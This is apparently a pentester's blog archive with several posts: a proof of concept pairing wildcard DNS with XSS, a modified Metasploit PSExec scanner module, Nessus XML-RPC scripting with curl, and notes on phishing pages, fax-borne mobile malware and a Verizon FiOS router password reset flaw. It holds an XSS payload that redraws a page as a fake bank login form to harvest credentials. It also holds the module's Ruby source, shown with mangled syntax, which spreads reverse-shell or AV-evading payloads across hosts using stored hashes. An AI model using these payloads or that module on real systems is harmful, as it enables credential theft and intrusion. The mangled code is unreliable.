Check your Logs – You May Be an Attack Platform

TL;DR: Millions of domains on the web use wildcard DNS records as “catch all’s” for all subdomains of their parent domain. When combined with a Cross-Site Scripting (XSS) flaw this allows remote attackers to use these sites to launch convincing XSS based spear phishing attacks that appear to source from these domains. These become free attack platforms for ne’er do-wells on the Internet.

If you want to see a practical example of an attack, skip down to section titled “Attack Proof of Concept“.

Also, to aide in understanding and to avoid having to read a bunch, I made a video (5:42 long) to compliment this blog:


While profiling organizations’ DNS for a pentesting engagement, or reviewing website access logs as a security analyst, you may come across oddities in URL’s accessed. You may see things like this: or If you find that these requests are being honored, and resolve to the parent domain of the request, this is a telltale sign that the website is being used by malicious actors in a spearfishing campaign. And there is also a high probability there is an XSS in the site as well.

I’ve begun to notice when simply using search engines to passively profile clients external DNS presence for pentests that some odd results will pop-up. In one recent case, some very obvious fake subdomains were indexed by google, showing up in search results for: “”. What was found to have happened was that malicious URLs used in spearfishing campaigns had been indexed by the Google spam filter (postini) for the client, and ended up in the search results for that clients domain. A side-bar discussion is what wildcard DNS records can do for (or how they can hurt) your brand. Having some nasty subdomains appear to be sanctioned portions for your company’s websites doesn’t look so hot.

This issue is not new (netcraft in 2005 netcraft in 2009), and has been reported on for years. But, not many people seem to care, or understand. If you’re a defender, perhaps this information can help you configure your logging systems to identify if attackers are using your hosts as attack platforms to lure victims via phishing. If you’re an assessor/pentester, perhaps you can start adding more context to why organizations should fix those external XSS flaws you’ve identified in your reports.

Some VERY brief background. Assuming you understand what DNS is (maps human readable names to IP addresses). A wildcard DNS record (something like * is used by a huge number of domains. Research here shows millions.

A wildcard DNS record, like the one I just mentioned above, will match any subdomain for a parent domain. If a user types in “” the response will direct users to Here’s a live example: this is an about page for – Now browse – See, it took you to the same place? I think you see where I’m going. Anything you put in place of “notreal” in the previous URL will resolve to

This is because a wildcard DNS record is in use. Now the crux of the issue: If a website has an XSS flaw, attackers can launch more convincing attacks against victims using the wildcard domain and will prep-end more legitimate looking subdomain text at the front of the domain. The idea being to coerce the victim into clicking or browsing the link.

Here is an example to drive home the point:

Users may often see the first part of the URL, a trusted known site, and ignore the remaining portions.

Now you can combine that with an XSS payload on the host site and you have a convincing attack. Many people’s understanding of XSS flaws stops at the alert boxes they’ve seen pop-up from pentests. What people don’t realize is that you have, in many cases, the full power of Javascript at your disposal when abusing XSS flaws. There is a handy trick phishers (and pentesters) use to weaponize XSS vulnerabilities: InnerHTML. You can use InnerHTML via JavaScript to rewrite the contents of a webpage, without ever having to leave the page. When a victim browses the site, the page is redrawn for their browser and they see what the attacker wants them to see, but they never actually leave the domain. Other attacks, that are common, are redirecting users to a malicious site or serving up content via an iFrame. The list of XSS attacks can go on and on.

To help prove the point, I will show an example of using a wildcard DNS record + XSS (using innerHTML) to attack a victim. Keep in mind, when someone is performing incident response, the source of the attacks could possibly be an innocuous domain. The attackers are leveraging the flaw to launch these attacks and the domains being used are often in the dark that they are helping the bad guys.

Attack Proof of Concept

Below is an image of a domain I own’s DNS config. Notice the wildcard entry.

The site at also suffers from a XSS flaw (that I put there), in that if you provide JavaScript to the HTTP parameter user the JavaSript will be rendered by the browser.

If a user were to click on the following link<script>alert("im_vuln_to_xss")</script>

they would land on the page at and the JavaScript between the <script> tags would execute.

In the below image the JavaScript code:


is passed to the user parameter and causes an alert box to pop up on the page. This is the most generic, basic XSS flaw. The JavaScript is passed to the browser, and the browser executes it. Simple.


We can see, if we view the source of the above webpage, the script tags that had been passed via the URL looks like valid script tags to the browser, and is therefore executed.


But you know this. Now let’s demonstrate a more real-world example of how this attack can abuse XSS and combine it with the wildcard DNS issue.

Rather than the JavaScript alert, I will use innerHTML to rewrite the content of the page to an attacker controlled form. I’ll also use a more convincing DNS name in an attempt to coerce a user into first clicking the link, then submitting their credentials.

First let’s abuse the wildcard DNS issue. We can prepend anything we want, so let’s try to make the user think they’re clicking a link to

Now examine this URL (which is not live, it is meant to be visually inspected) which is using innerHTML and a bogus subdomain (note i’ve made it multiple lines for easier viewing, this is one link):
test<script>document.documentElement.innerHTML = '<html>Totally Legit Bank Login
<img src=" dollar-sign-icon.png"></img>
<form action="">Username:<input type="text" name="username">Password:
<input type="password" name="password"><input type="submit" value="Submit"></form>

What happens when this URL is visited is the contents of the innerHTML portion of the JavaScript is written in the user’s browser; the HTML on the page is re-written just for that user’s session. In this case it is a simple HTML form, purporting to be from Take note, the user is not redirected anywhere. From the browser’s perspective the user is sitting on the fishing.php page hosted at The HTML form is drawn up within the user’s browser.

This form will harvest the user’s credentials if they provide their credentials and click Submit. This is an example of how wildcard DNS + XSS can lead to a cheap and easy spear phishing attack, abusing otherwise benign websites on the web.


Full Disk Encrypted Kali AWS EC2 Instance

I’ve been experimenting with AWS EC2 instances quite a bit lately. I’ve also been tinkering with various aspects of the AWS API, and found it to be very powerful, and useful.

I blogged recently about a project where I slightly modified an existing tool called encroot to get a full disk encrypted Kali EC2 instance. Check it out on my employer’s blog.

Use EXE::Custom with psexec scanner

Last year DarkOperator(Carlos Perez) released an awesome auxiliary module for the Metasploit Framework: the PSExec Scanner Auxiliary Module. This module allows you to use a set of credentials (or hashes) to run the psexec Metasploit module against a list of hosts. A very handy trick when you have a shared local admin account and want to get shells on a bunch of machines where those admin credentials work.

I simply added a few lines to his script that adds the EXE::Custom option, which allows you to specify a custom binary to use as a payload rather than have the psexec module create one on the fly. This is useful if you like to use a custom executable that already bypasses AV, since the stock Metasploit payloads often get caught by AV’s. You set the EXE::Custom option like you would any other option is msf, e.g. “set EXE::Custom /tmp/samba/revshell.exe”.

Be forewarned: Using the custom binary can take a little while longer to pop the box than when you run the module with the default options.

Below is the original script with my edits/additions highlighted. You can download the edited script here

# $Id$

# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#Slightly modified by pipefish to add the EXE::Custom option

require 'msf/core'
require 'rex'

class Metasploit3  'Auxiliary PSExec Scanner',
				'Description'   => %q{
					PSExec scanner module that will run a psexec attack against a range of hosts
					using either a set of credentials provided or the credential saved in the
					current workspace database.
				'License'       => MSF_LICENSE,
				'Author'        => [ 'Carlos Perez '],
				'Version'       => '$Revision$'
			['SMBUser', [false, 'SMB Username', nil]),'SMBPass', [false, 'SMB Password', nil]),'SMBDomain', [true, "SMB Domain", 'WORKGROUP']),'SHARE',     [ true,
						"The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]),'RHOSTS', [true, 'Range of hosts to scan.', nil]),'LPORT', [true, 'Local Port for payload to connect.', nil]),'LHOST', [true, 'Local Hosts for payload to connect.', nil]),'PAYLOAD', [true, 'Payload to use against Windows host',
						"windows/meterpreter/reverse_tcp"]),'TYPE', [false, 
						'Type of credentials to use, manual for provided one, db for those found on the database',
						'manual', ['db','manual']]),'OPTIONS',
				[false, "Comma separated list of additional options for payload if needed in 'opt=val,opt=val' format.",
					""]),'EXE::Custom', [false, 'Use custom exe instead of automatically generating a payload exe', nil]),'HANDLER',
					[ false, 'Start an Exploit Multi Handler to receive the connection', true]),
			], self.class)
		# no need for it
	def setup()
		# Set variables
		pay_name = datastore['PAYLOAD']
		lhost    = datastore['LHOST']
		lport    = datastore['LPORT']
		opts     = datastore['OPTIONS']

		if datastore['TYPE'] == "db"
			print_status("Using the credentials found in the workspace database")
			print_status("Using the username and password provided")
		@pay = create_payload(pay_name,lhost,lport,opts)
		create_multihand(pay_name,lhost,lport) if datastore['HANDLER']

	# Run Method for when run command is issued
	def run_host(ip)
		if check_port(ip)
			if datastore['TYPE'] == "manual"
				if not datastore['SMBUser'].nil? and not datastore['SMBPass'].nil?
					user = datastore['SMBUser']
					pass = datastore['SMBPass']
					dom = datastore['SMBDomain']
					payload = datastore['PAYLOAD']
					custexe = datastore['EXE::Custom']
					print_status("Trying #{user}:#{pass}")
				@creds.each do |c|
					user,pass = c.split(" ")
					dom = datastore['SMBDomain']
					payload = datastore['PAYLOAD']
					custexe = datastore['EXE::Custom']
					print_status("Trying #{user}:#{pass}")
	## Run psexec on a given IP
	def psexec(ip,user,pass,dom,payload,custexe)
		psexec = framework.modules.create("exploit/windows/smb/psexec")
		psexec.datastore['PAYLOAD'] = payload
		psexec.datastore['MODULE_OWNER'] = self.owner
		psexec.datastore['WORKSPACE'] = datastore["WORKSPACE"] if datastore["WORKSPACE"]
		psexec.datastore['RHOST'] = ip
		psexec.datastore['SMBUser'] = user
		psexec.datastore['SMBPass'] = pass
		psexec.datastore['SMBDomain'] = dom
		if not datastore['EXE::Custom'].nil?
			psexec.datastore['EXE::Custom'] = custexe
		psexec.datastore['SHARE'] = datastore['SHARE']
		psexec.datastore['RPORT'] = 445
		psexec.datastore['ExitOnSession'] = false
		psexec.datastore['DisablePayloadHandler'] = false
		psexec.datastore['EXITFUNC'] = 'process'
		psexec.datastore['VERBOSE'] = true
		psexec.datastore['DisablePayloadHandler'] = true
		psexec.datastore['ForceBlocking'] = true
			'LocalInput'	=> self.user_input,
			'LocalOutput'	=> self.user_output,
			'Payload'	=> payload,
			'Target'	=> 0,
			'ForceBlocking'	=> true,
			'RunAsJob'	=> false)

	def check_port(ip)
		status = false
		timeout = 1000
		port = 445
			s = connect(false,
					'RPORT' => 445,
					'RHOST' => ip,
					'ConnectTimeout' => (timeout / 1000.0)
			print_status("#{ip}:#{port} - TCP OPEN")
			status = true
		rescue ::Rex::ConnectionRefused
			vprint_status("#{ip}:#{port} - TCP closed")
		rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
		rescue ::Interrupt
			raise $!
		rescue ::Exception => e
			print_error("#{ip}:#{port} exception #{e.class} #{e} #{e.backtrace}")
			disconnect(s) rescue nil
		return status

	def collect_hashes
		type = "smb_hash|password"
		@creds = []
		print_status("Collecting Hashes from the DB")
		framework.db.workspace.creds.each do |cred|
			if and cred.ptype =~ /#{type}/ and cred.user !~ /(SUPPORT|HelpAssistant|TsInternetUser|IWAM|Guest)/
				@creds < mul.datastore['PAYLOAD'],
					'LocalInput'  => self.user_input,
					'LocalOutput' => self.user_output,
					'RunAsJob'    => true
			print_error("Could not start handler!")


Automating and Interacting with Nessus via XML-RPC

Update 05/21/2013 – The code for the python script that allows you to mass download Nessus reports can be found here. Also, here’s a post detailing a little bit about that script.

I recently started looking into the Nessus API Documentation and found that that you could interact with Nessus and get almost ALL of the features of the GUI via HTTP POST’s and GET’s.  You just needed to be able to parse out the XML responses.  Awesome!

If you look int API docs you’ll see it’s really straightforward; you can use tools like wget or curl to send the HTTP requests, then you can parse the XML response to pull the data you need.  I use xmlstarlet (just use apt-get install xmlstarlet in Ubuntu) as my parser.

Let’s start working with Nessus via curl.  First step, get logged in:

curl -k -c cookies.txt --data "login=YOURUSERNAME&password=YOURPASSWORD"

Here we’re ignoring SSL cert check (-k) and saving the cookies that are set are sent to a file for later use (-c cookies.txt).  Then we send the post parameters “login” and “password” to the “/login” page of our local Nessus scanner.  If you put in your username and password correctly you’ll see  an “OK” response and a session cookie is saved to cookies.txt.

Now we can re-use that cookie in later requests without having to re-authenticate.  I try to avoid hard coding passwords in scripts, it’s a bad practice.

NOTE: the Nessus config value “xmlrpc_idle_session_timeout” is set to 30 by default, so you can use that cookie for 30 minutes.

Now let’s list all of the available reports on our scanner and see the raw XML output:

curl -k -b cookies.txt


Above you’ll see I highlighted the “name” and the “readableName” node’s in the XML response. The name is the UUID. You’ll need to reference this when interacting with scansreports via xml-rpc.  The readableName is obviously the name you typed into the scanner when running the scan.

Now let’s make more sense of the XML response by using xmlstarlet to parsepull the relevant fields out.  NOTE: XML parsing and using XPATH queries are beyond the scope of this post.  If you’ve never used XPATH queries it’s simply a query syntax used when dealing with XML data and it’s hierarchical format of trees and nodes.

curl -k -b cookies.txt | xmlstarlet sel -B -t -m "reply/contents/reports/report/name" -v "." -o ": " -v "../readableName" -n


I output the UUID and the readable name next to each other (Click on picture above for a better view).

Now let’s get a list of running scans, and then pause all of them.  Notice the URL that i send requests to via curl has changed.  Now I’m interacting with scans, rather than reports.

curl -k -b cookies.txt|xmlstarlet sel -B -t -m "reply/contents/scans/scanList/scan/status" -o "UUID: " -v "../uuid" -o " Readable Name:" -v "../readableName" -o " Status:" -v "."  -n|grep running


You see I output the UUID, readable name and the scan status.  Now we’ll use a simple for loop and send the UUID of each scan that is running as a paramater to the /scan/pause page to pause the scans.

for scan in $(curl -k -b cookies.txt|xmlstarlet sel -B -t -m "reply/contents/scans/scanList/scan/status" -o "UUID: " -v "../uuid" -o " Readable Name:" -v "../readableName" -o " Status:" -v "."  -n|grep running|cut -d" " -f2); do curl -k -b cookies.txt --data "scan_uuid=$scan";done

If you log in to your scanner now you’ll see the scan names you grepped for and paused above are indeed paused.

I hope that’s given you an idea of how you can use XML RPC to customizecontrol your Nessus experience.

Track Your CPEs From Security ConsTraining

I know that folks have some varying opinions on IT certifications (especially IT security certifications).  While it’s true that you shouldn’t judge someones worth by the number of certifications they have, if you’re in IT or infosec (and you’re not already a rock star) you know that they are here to stay.  And, you know that you have to keep them updated to satisfy the powers that be, if you want to remain current.  Some (see DoD or even some security consultants) HAVE to maintain them to keep their jobs.  You do that by maintaining the required number continuing professional education points (CPEs).

There are many different ways to attain these CPE’s, but one is attending a conference or training.  I will be attending a security conference June 16th called RVAsec.  I was talking to someone about it and made the comment about earning CPEs for it, so i figured I’d bring up a neat way of tracking your CPEs from RVAsec (or any trainingstudy CPE earning activity) on  I have been a member of since it started.  It’s a handy way to track CPEs for multiple certs, and the development team is always adding features and finding ways to improve the site.  It’s free (there is a paid version with more features).  Whether you’re IT or you just have certs that require CPEs (like the CPAs out there) it’s a handy tool.

Two Wrongs Make A Right?

While I was checking my feeds the other day I noticed the article here from The Register. The gist of it is a Russian startup has a service that will disrupt torrents.  The technical information is still sketchy, but here’s a quote of a quote from The Register article: “We used a number of servers to make a connection to each and every p2p client that distributed this film,” Klimenko says of the technology test. “Then Pirate Pay sent specific traffic to confuse these clients about the real I.P. addresses of other clients and to make them disconnect from each other.”  Sounds suspiciously close to the old TCP spoofed reset denial of service from back in the day to me.  Rather sending sending RST’s they’re just sending bogus IP info or something.

This seems like it would be on the wrong side of the law in some countries.  Maybe not, could be a grey area.  My thought: Is DoS-ing a service you (or your investors) think is wrong make it rightlegal?  And let’s look at what a DoS is from wikipedia “In computing a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer or network resource unavailable to its intended users. ”  The Pirate Pay sounds like they’re DoS-ing a service to me.  I’d be interested to hear what the community has to say?  I don’t want to turn this into a “pro-piracyanti-piracy” debate, this more about the principal behind their approach:  What do you think about a company using tools or techniques to disrupt operations or traffic on other users’ machines?

Don’t Wait, and DON’T CLICK!

If you browse or are redirected to a website or click a link and see a screen like the one below, do not wait, simply close the browser. That “Wait Please” is static text, however if you look at the page source there are several malicious javascripts (second picture) attempting to send you to a URL that usually has some malware or drive by download (FakeAV most of the time).



I’ve seen quite a bit of this the last few weeks, and most of it has been the result of someone clicking on a link from within a spam email. Here’s a protip (pass on to your friends, family, colleagues and anyone who will listen): If you get an email that is concerning, don’t just blindly click the link. In the below case, if you simply hover your mouse over the links you’ll see they point to pages that have nothing to do with the company that the email is claiming to be from.


If you must follow the link use a browser sandbox like sandboxIE.

Mobile Malware via a FAX

This is a new school twist to an old school scam, fax machine spam.  Miscreants would send out bogus faxes with scam numbers many times just trying to hawk “dealz” or, in some cases try to phish info from the caller.  But, for the most part fax machine spam has subsided (i think, i have no real data, just a hunch).

A friend, who wishes to remain anonymous, said that several of these faxes appeared at her office over the last two days.  She forwarded me a scan of one to review.

You can see that this is all sorts of wrong, even the QR codes look like they were psychically  pasted (after the fact) on this fax.  What was interesting is that the QR code leads to a site that wants you to download an app (link for both Andoird and Apple devices) to install on your phone.  I’ve redacted the QR codes and numbers to protect the innocent (and inept).

Looking into it further these are bogus premium rate SMS apps that send text messages to numbers the scammers control, then you get charged for premium SMS messages and they make cash.  Be warned, don’t just scan QR codes everywhere.  I wonder how many people at my friends company used their neato smart phone to follow those codes and installed those apps?  Maybe it’s not a bad idea to protect your main corporate fax number a bit, too.

Home Network Users Be Ware

You can reset the router password of most stock setups of Verizon’s FiOS Internet service without authorization, and without physical access.  That is a bold statement, but one that I have found to be true every single time I test it out.  And if I’ve found this out, chances are good that plenty of others have as well.  I have called and emailed Verizon several times about this issue and have gotten a mix of “I didn’t know that was possible”, to “Yeah, that’s a value add feature for our customers”.  Either way the big V has not addressed the problem.  My hope is that someone brings this up to the President of Verizon Security Awesomeness  and says “Uhh, we may need to rethink this one!”.

For brevity’s sake I’ll sum it up here: You can download the Verizon In Home Agent and reset the router password of any FiOS router. The only requirement is you be on the same network as the router. No authentication required (See picture, note it doesn’t ask for old password!).

For the long version expand the box below.

[learn_more caption=”Click to Expand The Long Story”] I found this issue out by accident, after I moved. I had Verizon come out and transfer my FiOS service to my new address. The tech was doing the usual stuff, then said “Now I have to verify connectivity. Do you have a computer we can use to test it out?”. I ambled up and set my laptop in front of him, which was running Ubuntu. The tech instantly stated, “Uh, we don’t officially support machines unless they’re a Windows PC.” I browsed the Internet and was satisfied. He said, “We have to run a program to test connectivity or I don’t get credit for the install”. The “program” in question was an exe. ~Sigh~ Ok, fine, so I booted up my Windows 7 VM. He plugged in a thumb drive and fired off some exe. Now, I won’t even go in to the fact that I would usually NEVER let anyone plug in a random thumb drive to my PC and run some exe, but this was a VM and I wanted him to finish, so I held my tongue. The exe launched some apps that looked like they were testing different aspects of my FiOS service. But for I’ll I know I was being enrolled in a botnet. But that’s neither here nor there.

When all the colors on the screen showed green he said “Now I’m going to show you about Verizon’s In Home Agent”. I didn’t feel like dealing with it, but he was in full on canned speech mode. “It let’s you diagnose issues, collect log info for support and do some other neat stuff, like reset the router password.” Fine, fine, get out thank you, enjoy your life tech-guy. When he left I went to log in to the router with the password he had left me (Password1). Of course wireless security was set to what Verizon always sets it to: WEP. I went in changed to WPA2 PSK, and changed the passphrase, then I went to change the password but accidentally closed the window before I did. Shucks… but wait… the In Home Agent screen was up and the option “Change Password” was sitting right there. Ok, I’ll bite. So i clicked it. It asked for a new password. It DID NOT ask for an old one. Hmm, so i typed in a new password. Then I tried to log into the router. My new password worked. Interesting. Well, maybe since the application was running earlier it cached the first password when i logged into the site… I dunno how, but maybe. So, I reboot and used the In Home Agent and changed the password to something new, without being prompted for the old one. Fascinating. I went to my neighbor later and asked if I could test something out. They owe me since I have fixed their computers for free, so they let me tinker. They let me connect to their network (which was WEP) and I ran the In Home Agent. I then preceded to change their router password without being asked for the original. Yikes.

My first call to Verizon, I explained how most times Verizon techs come out for a FiOS move or install they set wifi security to WEP.  I was told this was because not all customers’ computers support WPAWPA2, and they want to ensure that their customers can use their wifi.  Ok, but WEP can be cracked in minutes.  There have been dozens of articles published on how to do it.  But, that’s not the worst part.  If i get on to a network (crack their WEP or am allowed in) all I have to do is run the In Home Agent and I can reset their router password.  I dont have to MiTM them, nor find vulns in their PC’s to exploit, I can just own them at their gateway.  Redirect DNS where I want, set new routes.  “Hmm, I’ll inform my manager about your concerns”.  That’s all I got the first call.  Several other calls, and several emails later there has been no update to the In Home Agent.

I did get one tech who said “Well, I mean you know, if you’re on the network we figure you’re allowed to be… so you can reset the password I guess”.  Ok, but if i crack the WEP I got on without being allowed to be…  or if I’m a parent and I want to set parental controls or filters all my kid has to do is reset my router password and log in… ~sigh~ it doesn’t get through.

I guess a bullet point here is (obviously) don’t use WEP, and even if you use WPA2, be careful who you allow on your network.  Any guest on your network can reset your router password.  And, how often do you log in and check that, anyways?

Hopefully having this on the Interwebs will get them to wake up.  Because a concerned customer’s harassment apparently can’t.